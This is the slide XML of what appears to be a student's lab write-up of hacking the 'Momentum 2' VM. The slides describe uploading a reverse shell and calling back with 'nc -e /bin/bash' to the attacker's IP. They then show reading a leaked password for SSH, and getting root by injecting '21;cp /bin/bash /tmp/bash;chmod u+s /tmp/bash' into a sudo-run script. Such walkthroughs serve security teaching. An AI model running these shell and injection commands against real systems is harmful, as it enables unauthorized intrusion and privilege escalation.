        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="-42862"/>
            <a:ext cx="6172199" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3240" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>Final Exam Momentum 2 VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3240" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>Hacked and presented by</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3240" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>Logan Davenport of Team </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3240" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>Cyberwolf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3240" dirty="0">
              <a:latin typeface="Futura"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3240" dirty="0">
              <a:latin typeface="Futura"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3385429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3C788F93-BE8B-2AE7-0F65-D361E9B53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999" y="202945"/>
            <a:ext cx="8091368" cy="6466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7218D584-A21D-36FE-5FD4-D725A5559012}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="100584" y="1305341"/>
            <a:ext cx="3730752" cy="4247317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>After our .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> script is written and our reverse shell and abcs.txt are tucked away inside the script then we can run command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> +x script.py</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>and python3 script.py the function of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> +x is to make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>script.p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> function as a program. Then we use python3 script.py to run the upload and if everything is done correctly in the subdirectory /owls of the server we will see that our reverse shell is now on the target machine.  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="68002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222EE556-02E7-9F0F-52F0-9905702CF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59" y="265747"/>
            <a:ext cx="5328566" cy="5805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computer screen&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{361C8B99-95A2-AEC9-049A-C25009AFA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5945" y="265748"/>
            <a:ext cx="4523697" cy="24885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991C2BCF-6A53-766A-A4DF-5891671FD1CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="3429000"/>
            <a:ext cx="6181344" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>Once we are in our shell we can run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>rlwrap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>lnvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> with any port number on our machine, using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>rlwrap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> gives our listener </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>readline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> support for command line editing. After we run this command we can now go into our shell and use the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> (our machines IP) with the port in this case 5555 and since we used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>rlwrap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> we can use –e /bin/bash to give us a backdoor to the system.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4223961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CFFDAB39-8231-6779-3E5A-72D5FFB34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425" y="289535"/>
            <a:ext cx="4465825" cy="4007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computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1160A86-1CA1-2DA1-F7DD-AD7436630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025" y="289534"/>
            <a:ext cx="4967002" cy="40074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37EEAEBC-34DC-CF3C-21E6-D9B561611E92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="247650" y="4495800"/>
            <a:ext cx="11868150" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Futura"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB260CB5-11B4-8E00-D7ED-2DF0F821EA44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="205776" y="4495800"/>
            <a:ext cx="11932848" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>Now that we are in we can run the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> and see we are in /var/www/html/owls and then we can run python3 –c ‘import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>pty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>pty.spawn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>(“/bin/bash”)’ which will create a bash shell for us. Using export TERM=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>xterm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> we can set the environment for the backdoor and from there get in the home directory. Now when we run the command ls we can see we have found a directory for a user named Athena, we can use cd to navigate to the directory where we can now see two files user.txt a flag that you will see a screenshot of its contents on the final slide of this presentation and then we have password-reminder.txt which then with the command cat we see we have found a password so we can now run this on the SSH port 22 and see if we can gain access.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1651332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04CADBA-5800-9244-C3FD-11F3965E6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800" y="193058"/>
            <a:ext cx="4678023" cy="38531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screenshot of a computer program&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C84DDACA-235B-1CDB-440A-000DDB213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579" y="193058"/>
            <a:ext cx="4846794" cy="3853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1B3ACC9C-DA2F-D81E-97E7-B45D8769CA6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266700" y="4314824"/>
            <a:ext cx="11791950" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>Now we can gain SSH access using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>athena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>@(target machines IP) and input password ”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>myvulnerableapp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>*” from here we can now see we are in /home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>athena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> giving us conformation that we have successfully logged in. So now we will run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>athena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> to escalate our privileges and then run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> –l to list the commands we are allowed to run the following commands as root /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>/bin/python3 /home/team-tasks/cookie-gen.py which is a python script for random cookie generation. At the end of this script we can see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> = “echo %s &gt;&gt; log.txt” % seed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>subprocess.popen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>, shell=true) showing that this script executes bash commands so now we can try to append some commands to the end to attempt to get root access. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1112365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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A computer screen shot of a program&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3553969C-CBA5-4144-16D6-F0D690C15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81" y="207571"/>
            <a:ext cx="4296746" cy="3838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screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E74159B8-0859-8FAD-02A9-A3B86E98C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5572" y="207571"/>
            <a:ext cx="4566779" cy="3838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EDC32E32-5EA0-5C0A-7ED8-E4869036F92C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="4162425"/>
            <a:ext cx="11906250" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>On the left we have the flag obtained from the earlier slide for the user flag and on the right we have the root flag.  To finish gaining access to the root flag </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>we can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> python3 /home/team-tasks/cookie-gen.py once prompted to input the seed we can enter “21;cp /bin/bash /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>bash;chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>u+s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>/bash to append the command and give us root. This took some research and some trial and error until finally coming across this command which worked for me, In this command we first add a seed value and then copy /bin/bash into /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>/bash creating a bash shell. With /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>bash;chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>u+s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>/bash we can set the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>suid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> to the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>/bash allowing us to execute using elevated privileges and finally we run /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>/bash –p to execute the command giving us the bash shell and now we can cat root.txt for the final flag.   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="105680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87DA83-039D-796B-E503-8A2F9AABDCC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384048" y="707886"/>
            <a:ext cx="11576304" cy="563231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utura"/>
              </a:rPr>
              <a:t>Virtual box Kali Linux – Kali Linux was used for its arsenal of pre-installed hacking tools and the virtual box variant for its secure lab environment. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Futura"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>Netdiscover -  Netdiscover is a useful tool for network scanning using sudo netdiscover -r with </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>IP: 10.0.2.0/24 -r for range, /24 being the subnet mask and netmask 10.0.2.0 to start scanning at the beginning of my IP for my virtual box.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Futura"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>Nmap -  Nmap is a port scanner helpful for scanning a vast number of ports allowing us to determine possible entry points, using –T0 through –T5 we can alter the aggressiveness of the scan increasing the speed of the scan as well as detectability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
